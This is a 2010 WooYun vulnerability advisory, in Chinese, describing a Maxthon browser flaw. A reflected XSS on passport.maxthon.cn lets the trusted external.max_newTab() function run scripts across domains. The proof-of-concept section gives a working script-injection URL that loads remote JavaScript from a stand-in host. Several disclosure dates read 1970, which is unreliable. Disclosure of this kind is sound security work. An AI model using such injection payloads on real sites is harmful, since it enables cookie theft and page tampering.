漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2010-058
漏洞标题:遨游浏览器跨域脚本漏洞
相关厂商:傲游
漏洞作者: 结界师
提交时间:2010-07-21 23:18
修复时间:2010-08-21 00:00
公开时间:2010-08-21 00:00
漏洞类型:设计错误/逻辑缺陷
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2010-07-21: 细节已通知厂商并且等待厂商处理中
1970-01-01: 厂商已经确认,细节仅向厂商公开
1970-01-04: 细节向第三方安全合作伙伴开放
1970-02-25: 细节向核心白帽子及相关领域专家公开
1970-03-07: 细节向普通白帽子公开
1970-03-17: 细节向实习白帽子公开
2010-08-21: 细节向公众公开
简要描述:
傲游浏览器是符合中国人使用习惯的多标签浏览器,拥有业界最优秀的在线收藏和广告过滤功能 。遨游浏览器在架构设计上存在一个安全缺陷,同时结合自身接口函数的安全问题,可以突破浏览器同源策略,导致一个跨域脚本漏洞。
详细说明:
遨游浏览器一个external接口函数没有遵循同源策略,存在一个跨域脚本漏洞。
漏洞函数external.max_newTab(),函数的功能是打开一个新的标签页。该函数存在一个时间竞争条件错误,可以突破同源策略跨域操作窗口对象,跨域执行任意脚本。
同时遨游浏览器自定义开发的external接口函数设定了一个信任域,该信任域包括*.maxthon.cn等,结合*.maxthon.cn任意web应用的一个脚本漏洞就可以调用漏洞函数external.max_newTab()执行跨域操作。
漏洞证明:
POC:
1. passport.maxthon.cn存在一个跨站脚本漏洞,通过跨站脚本漏洞可以调用漏洞函数,嵌入一个远程的js http://127.0.0.1/vul.js
http://passport.maxthon.cn/new/register_account.html?account="><script/src=http://127.0.0.1/vul.js></script>
2.调用漏洞函数的javascript脚本
危害结果:
新打开的三个标签页窗口将随机命中一个窗口跨域注入脚本运行,如百度网页被读取COOKIE并篡改网页。
修复方案:
1.修复*.maxthon.cn域名内的WEB应用漏洞。
2.修复有漏洞的接口函数external.max_newTab()。
版权声明:转载请注明来源 结界师@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:12
确认时间:2010-07-21 23:18
厂商回复:
漏洞处理中.
最新状态:
2010-11-05:已修复